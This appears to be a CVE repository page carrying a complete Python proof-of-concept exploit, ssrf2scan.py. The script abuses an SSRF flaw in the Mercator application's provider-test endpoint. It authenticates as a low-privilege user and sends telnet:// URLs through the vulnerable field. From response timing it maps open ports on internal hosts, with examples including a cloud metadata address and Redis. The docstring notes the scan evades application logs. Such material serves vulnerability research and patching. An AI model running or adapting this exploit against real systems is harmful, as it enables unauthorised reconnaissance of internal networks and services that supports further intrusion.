5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / ssrf2scan.py PY
#!/usr/bin/env python3
"""
Mercator SSRF Port Scanner — TCP port enumeration via the unvalidated
`provider` URL of `ConfigurationController::testProvider`.

Method
------
The vulnerable controller calls libcurl on the attacker-supplied URL with
a 10-second timeout. By using the `telnet://` scheme, libcurl performs a
plain TCP connection and waits for the server to speak first — sending no
application-layer payload at all. Two observable outcomes:

    * TCP RST received quickly  (~0.15 s)  ->  CLOSED   port is not accepting connections
    * No reply within 10 seconds (~10 s)   ->  OPEN     port accepted the TCP connection

Because no HTTP, gopher, Redis or other protocol bytes are sent, the scan
is essentially invisible to application-layer logs on the target — only
the raw TCP handshake is visible. In rare environments a firewall that
silently drops packets ("filter") will also produce OPEN; this is an
acceptable ambiguity for enumeration purposes.

Auth
----
Any account with the `configure` permission. By default Mercator grants
this to the `User` role (`PermissionRoleTableSeeder.php`), so a regular
low-privilege account is sufficient.

Usage
-----
    ./bin/python3 ssrf_portscan.py \\
        --base http://127.0.0.1:8000 \\
        --user lowuser --password 'Lowuser123!' \\
        --target 127.0.0.1 --ports 22,80,443,3306,6379,8000

    # Port range
    ./bin/python3 ssrf_portscan.py ... --target 10.0.0.5 --ports 1-1024

    # Explicit list of host:port (each entry MUST carry a port)
    ./bin/python3 ssrf_portscan.py ... --endpoints 169.254.169.254:80,10.0.0.5:6379
"""
import argparse
import re
import sys
import time
import warnings

# macOS system Python links LibreSSL; urllib3 v2 emits a one-time
# NotOpenSSLWarning when imported. Purely cosmetic for this PoC — filter
# it before `requests` pulls urllib3 in (disable_warnings() runs too late,
# the warning fires at import time).
warnings.filterwarnings("ignore", message=r"urllib3 v2 only supports OpenSSL")

import requests
import urllib3
urllib3.disable_warnings()

LOGIN_TOKEN_RE = re.compile(r'name="_token"\s+value="([^"]+)"')
CSRF_META_RE = re.compile(r'name="csrf-token"\s+content="([^"]+)"')

# Threshold (seconds). Below = TCP RST received fast (CLOSED). Above = curl
# hit its 10s timeout (OPEN/filtered). Local-loop RSTs round-trip <0.5s; we
# leave a comfortable margin.
OPEN_THRESHOLD = 8.0


# ── Shared scaffold (identical across the Mercator exploit scripts) ──────────

def log(message):
    """Status banner — emitted on stderr so stdout stays pure result data."""
    print(message, file=sys.stderr)


def die(message):
    log(f"[!] {message}")
    sys.exit(1)


def login(session, base, user, password):
    """Authenticate, print the login section, and return the CSRF token."""
    r = session.get(f"{base}/login", timeout=10)
    m = LOGIN_TOKEN_RE.search(r.text)
    if not m:
        die("CSRF token not found on /login")
    r = session.post(
        f"{base}/login",
        data={"_token": m.group(1), "login": user, "password": password},
        timeout=10, allow_redirects=True,
    )
    if r.url.rstrip("/").endswith("/login"):
        die(f"authentication failed for '{user}'")
    m = CSRF_META_RE.search(r.text) or LOGIN_TOKEN_RE.search(r.text)
    if not m:
        die("CSRF token not found after login")
    csrf = m.group(1)
    log("[+] login")
    log(f"    user       : {user}")
    for c in session.cookies:
        log(f"    cookie     : {c.name}={c.value}")
    log(f"    csrf token : {csrf}")
    return csrf


# ── SSRF port scan ──────────────────────────────────────────────────────────

def require_configure(session, base):
    """Confirm the account holds the `configure` permission."""
    r = session.get(f"{base}/admin/config/parameters?tab=cve", timeout=10)
    if r.status_code == 403:
        die("account lacks the 'configure' permission")


def probe(session, base, csrf, target):
    """Send one telnet:// probe. Return (state, elapsed_seconds)."""
    t0 = time.perf_counter()
    session.post(
        f"{base}/admin/config/parameters",
        data={
            "_token": csrf,
            "_method": "PUT",
            "active_tab": "cve",
            "action": "test_provider",
            "provider": f"telnet://{target}#",
        },
        allow_redirects=False, timeout=15,
    )
    session.get(f"{base}/admin/config/parameters?tab=cve")
    elapsed = time.perf_counter() - t0
    return ("OPEN" if elapsed > OPEN_THRESHOLD else "CLOSED"), elapsed


def parse_ports(spec):
    out = []
    try:
        for chunk in spec.split(","):
            chunk = chunk.strip()
            if not chunk:
                continue
            if "-" in chunk:
                a, b = chunk.split("-", 1)
                out.extend(range(int(a), int(b) + 1))
            else:
                out.append(int(chunk))
    except ValueError:
        die(f"invalid --ports spec {spec!r} (expected e.g. '22,80,443' or '1-1024')")
    seen = set()
    return [p for p in out if not (p in seen or seen.add(p))]


def build_targets(args):
    if args.endpoints:
        out = [t.strip() for t in args.endpoints.split(",") if t.strip()]
        # telnet:// has no port -> libcurl falls back to 23, silently
        # mis-scanning. Refuse port-less endpoints rather than lie.
        bad = [t for t in out if ":" not in t.rsplit("]", 1)[-1]]
        if bad:
            die(f"--endpoints entries need an explicit ':port' -> {', '.join(bad)} "
                f"(use --target {bad[0]} --ports <list> to scan a host)")
        return out
    if not args.target or not args.ports:
        die("need --endpoints, or --target + --ports")
    return [f"{args.target}:{p}" for p in parse_ports(args.ports)]


def main():
    ap = argparse.ArgumentParser(
        formatter_class=argparse.RawDescriptionHelpFormatter, description=__doc__)
    ap.add_argument("--base", default="http://127.0.0.1:8000", help="Mercator base URL")
    ap.add_argument("--user", required=True, help="account login")
    ap.add_argument("--password", required=True)
    ap.add_argument("--target", help="host scanned (combined with --ports)")
    ap.add_argument("--ports", help="port list/range, e.g. '22,80,443' or '1-1024'")
    ap.add_argument("--endpoints",
                    help="explicit 'host:port,host:port,...' (each needs a port)")
    ap.add_argument("--delay", type=float, default=0.0,
                    help="seconds to sleep between probes (default: 0)")
    args = ap.parse_args()

    targets = build_targets(args)

    session = requests.Session()
    session.verify = False
    csrf = login(session, args.base, args.user, args.password)
    require_configure(session, args.base)

    log(f"[*] scanning {len(targets)} target(s) via SSRF telnet probe")
    print(f"{'TARGET':<28}  {'STATE':<8}  TIME")
    print("-" * 50)
    for t in targets:
        try:
            state, elapsed = probe(session, args.base, csrf, t)
        except requests.RequestException as e:
            print(f"{t:<28}  {'ERROR':<8}  {e}")
            continue
        print(f"{t:<28}  {state:<8}  {elapsed:.2f}s")
        if args.delay > 0:
            time.sleep(args.delay)


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        die("interrupted")
    except requests.RequestException as e:
        die(f"could not reach Mercator: {e}")